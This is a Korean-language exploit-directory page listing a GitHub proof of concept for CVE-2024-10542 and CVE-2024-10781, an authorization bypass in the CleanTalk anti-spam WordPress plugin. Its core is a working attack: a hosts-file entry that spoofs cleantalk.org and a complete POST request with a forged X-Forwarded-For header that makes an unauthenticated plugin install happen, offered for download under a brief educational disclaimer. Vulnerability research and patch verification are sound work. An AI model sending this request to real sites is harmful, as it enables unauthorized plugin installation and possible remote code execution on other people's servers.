Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-10542 — WordPress Spam protection, AntiSpam, FireWall by CleanTalk 플러그인 <= 6.43.2는 인증되지 않은 임의 플러그인 설치(Unauthenticated Arbitrary Plugin Installation) 취약점에 노출되어 있습니다. | Kitploit
도구/GitHubGitHub/ubaydev/cve-2024-10542
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & Education
GitHububaydev/cve-2024-10542

CVE-2024-10542

WordPress Spam protection, AntiSpam, FireWall by CleanTalk 플러그인 <= 6.43.2는 인증되지 않은 임의 플러그인 설치(Unauthenticated Arbitrary Plugin Installation) 취약점에 노출되어 있습니다.

저장소 보기
31년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2024-10542 및 CVE-2024-10781의 PoC: CleanTalk 플러그인 <= 6.43.2의 스팸 보호, 안티스팸, 방화벽에서의 인증 우회(Broken Authentication)

면책 조항:

본 문서에서 CVE-2024-10542와 관련하여 제공되는 정보는 학습 및 교육 목적으로만 제공됩니다. 우리는 이 정보를 악용, 시스템 변조, 기타 불법 활동을 포함하되 이에 국한되지 않는 유해한 목적으로 사용하는 것을 권장하거나 승인하지 않습니다.

소개:

점점 더 복잡해지는 디지털 환경에서 웹사이트의 보안을 보장하는 것은 많은 사이트 소유자에게 가장 중요한 일입니다. 최근 WordPress 사이트에 심각한 위협이 되는 두 가지 치명적인 취약점이 발견되었습니다. 이 취약점들은 스팸 보호, 안티스팸 및 방화벽 기능을 제공하는 잘 알려진 CleanTalk 플러그인에 영향을 미칩니다. 무엇이 이 상황을 더욱 긴급하게 만들까요? 더 자세히 살펴보겠습니다! CVE-2024-10542 및 CVE-2024-10781로 추적되는 두 가지 취약점은 인증되지 않은 공격자가 취약한 사이트에 악성 플러그인을 설치하고 활성화할 수 있게 합니다. 이는 사이트의 평판을 손상시킬 뿐만 아니라 공격자가 원격 코드를 실행할 수 있는 길을 열어줍니다. CVSS 점수가 10점 만점에 9.8점이라는 점에서 이 취약점들이 매우 위험한 범주에 속한다는 것은 명백합니다. Wordfence에 따르면 두 취약점 모두 악의적인 행위자가 임의의 플러그인을 설치하고 활성화할 수 있게 하는 인가 우회 문제와 관련되어 있습니다. 이후 활성화된 플러그인 자체에 취약점이 있는 경우 원격 코드 실행으로 이어질 수 있습니다.

PoC:

먼저 악의적인 사용자는 운영 체제의 hosts 파일을 다음과 같이 설정합니다:

root@kitploit:~
127.0.0.1 cleantalk.org

그런 다음 다음과 같은 요청을 전송합니다

root@kitploit:~
POST /?plugin=wp-hooks-finder/index.php HTTP/1.1
Host: wordpress.test
Content-Length: 56
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://wordpress.test
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.6367.60 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
X-Forwarded-For: 127.0.0.1
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: close

spbc_remote_call_action=install_plugin&plugin_name=apbct

결론:

사이버 보안은 모든 사이트 소유자가 함께 져야 할 책임입니다. 플러그인을 최신 상태로 유지하고 잠재적인 취약점에 대해 경계를 늦추지 않음으로써 악의적인 공격으로부터 사이트를 보호할 수 있습니다. CleanTalk를 최신 버전으로 업데이트하고 다른 플러그인도 정기적으로 점검하여 최대한의 보안을 보장하십시오. 작은 조치가 큰 재앙을 예방할 수 있다는 것을 기억하세요!

참고 자료:

  • https://thehackernews.com/2024/11/critical-wordpress-anti-spam-plugin.html
  • https://patchstack.com/database/vulnerability/cleantalk-spam-protect/wordpress-spam-protection-anti-spam-firewall-by-cleantalk-plugin-6-43-2-authorization-bypass-via-reverse-dns-spoofing-vulnerability
  • https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/cleantalk-spam-protect/spam-protection-anti-spam-firewall-by-cleantalk-6432-authorization-bypass-via-reverse-dns-spoofing-to-unauthenticated-arbitrary-plugin-installation
  • https://plugins.trac.wordpress.org/changeset/3179819/cleantalk-spam-protect#file631

커피 한 잔 사주세요:

  • https://saweria.co/ubaii
  • https://buymeacoffee.com/ubaii
  • https://trakteer.id/ubaii

감사 인사:

Allah, Muhammad SAW, mikemyers, Markdown Monster, 제 가족, 그리고 여러분?

도구 다운로드